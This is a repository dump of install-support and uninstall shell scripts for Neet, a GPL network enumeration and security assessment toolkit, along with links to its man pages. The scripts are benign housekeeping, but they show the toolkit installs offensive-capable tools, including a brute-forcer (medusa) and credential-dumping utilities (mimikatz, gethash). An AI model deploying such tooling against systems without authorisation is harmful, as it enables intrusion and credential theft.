# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# Check that we have a proper representation of the binary
# paths
export NEET="/opt/neet"
export CONFDIR="${NEET}/etc"

rm -f "${CONFDIR}/locations"
echo "neet=$NEET" > "${CONFDIR}/locations"

for bin in nmap amap tcptraceroute traceroute wget sslscan dig rpcclient net snmpwalk ruby java \
  ldapsearch medusa smbclient snmpget snmpset nmblookup rpcinfo xwd ntpdate ldapsearch \
  openssl openvas-nasl winexe; do

  if type $bin >/dev/null 2>&1; then
    SystemPath=`type $bin 2>/dev/null | awk '{print $3}'`
    if ! grep "^${bin}=" "${CONFDIR}/locations" >/dev/null 2>&1; then
      echo "$bin=$SystemPath" >> "${CONFDIR}/locations"
    else
      cat "${CONFDIR}/locations" | grep -v "^${bin}=" > "${CONFDIR}/locations.tmp"
      mv "${CONFDIR}/locations.tmp" "${CONFDIR}/locations"
      echo "$bin=$SystemPath" >> "${CONFDIR}/locations"
    fi
  fi
done

OWD="$PWD"
cd "${NEET}/pkg/bin/"
for bin in *; do
  if ! grep "^${bin}=" "${CONFDIR}/locations" >/dev/null 2>&1; then
    echo "${bin}=${NEET}/pkg/bin/$bin" >> "${CONFDIR}/locations"
  else
    cat "${CONFDIR}/locations" | grep -v "^${bin}=" > "${CONFDIR}/locations.tmp"
    mv "${CONFDIR}/locations.tmp" "${CONFDIR}/locations"
    echo "${bin}=${NEET}/pkg/bin/$bin" >> "${CONFDIR}/locations"
  fi
done
cd "$OWD"

--------------------------------------------------------------------------------
/content/main/man/neet-qs.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neet-qs.1.gz

--------------------------------------------------------------------------------
/content/main/man/neet.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neet.1.gz

--------------------------------------------------------------------------------
/content/main/man/neetsh.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neetsh.1.gz

--------------------------------------------------------------------------------
/content/uninstall.sh:
--------------------------------------------------------------------------------
#!/bin/bash

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

if [ `id -u` -ne 0 ]; then
  echo "You must be root to remove Neet."
  exit 1
fi

PREFIX=/opt
export PREFIX
export NEET="${PREFIX}/neet"
export CONFDIR="${NEET}/etc"
export CONFIG="${CONFDIR}/neet.conf"
export INST="$PWD"

INSTALLED=1
DOUNINSTALL=1

# Import some functions
if [ -f "${NEET}/core/installsupport" ]; then
  . "${NEET}/core/installsupport"
else
  . install/installsupport
fi

if [ ! -d "${NEET}/bin" ]; then
  INSTALLED=0
fi

if [ -z "$NEETINSTALLER" ]; then
  # Standalone uninstall
  if [ $INSTALLED -eq 0 ]; then
    echo "Neet installation not found in $PREFIX/. Can't uninstall."
    exit 1
  fi
  echo "This will remove Neet and its components. Are you sure? [y/N]"
  read -sn1 r
  if [ -z "$r" ] || [ "$r" != "y" ]; then
    echo "Uninstall aborted by user."
    exit 0
  fi

else
  # Being run as part of the neet installer
  if [ $INSTALLED -eq 0 ]; then
    echo "No previous NEET installation found."
    DOUNINSTALL=0
  else
    echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"
    echo
    echo "A previous Neet installation was found, and will be removed first. This"
    echo "will remove the previous installation of Neet and all its components."
    echo "Are you sure? [y/N]"
    read -sn1 r
    if [ -z "$r" ] || [ "$r" != "y" ]; then
      echo "Uninstall aborted by user. Neet installation will not continue."
      exit 0
    fi
  fi
fi

if [ $DOUNINSTALL -eq 1 ]; then
  echo "Uninstalling"
  for bin in neetsh neet neet-maint gethash mimikatz neet-update; do
    [ -s "/usr/bin/$bin" ] && rm "/usr/bin/$bin" -f
    # Old versions of neet
    [ -s "/usr/local/sbin/$bin" ] && rm "/usr/local/sbin/$bin" -f
  done

  # Preserve config in case we want to use it in future
  if [ -f "${CONFIG}" ]; then
    mv "${CONFIG}" "${HOME}/neet.conf.saved"
  fi

  # Do the main deed
  rm -rf "${NEET}"

  # Old versions of neet
  rm -rf /etc/neet/

  # Now the man pages
  MANIN=0
  if [ -f /etc/manpath.config ]; then
    for path in `grep ^MANDATORY_MANPATH /etc/manpath.config | grep /usr/local/ | awk '{print $2}'`; do
      if [ -d "$path" ]; then
        MANIN=1
        manpath=$path
        break
      fi
    done
  else
    for path in `echo $MANPATH | sed -e 's/:/ /g'`; do
      if [ -d "$path" ]; then
        MANIN=1
        manpath=$path
        break
      fi
    done
  fi
  if [ $MANIN -eq 0 ]; then
    manpath=/usr/share/man
    MANIN=1
  fi

  if [ $MANIN -eq 1 ]; then
    for man in neet.1.gz neetsh.1.gz neet-qs.1.gz; do
      rm -f "${manpath}/man1/${man}"
    done
  fi

  # Older versions of neet stored man pages in /usr/share/man. Remove them in case
  # this process picked a different man path.
  rm -f /usr/share/man/man1/neet*

  echo "Neet has been removed from the system"
fi

--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
#!/bin/bash

cd content
. ./install.sh

--------------------------------------------------------------------------------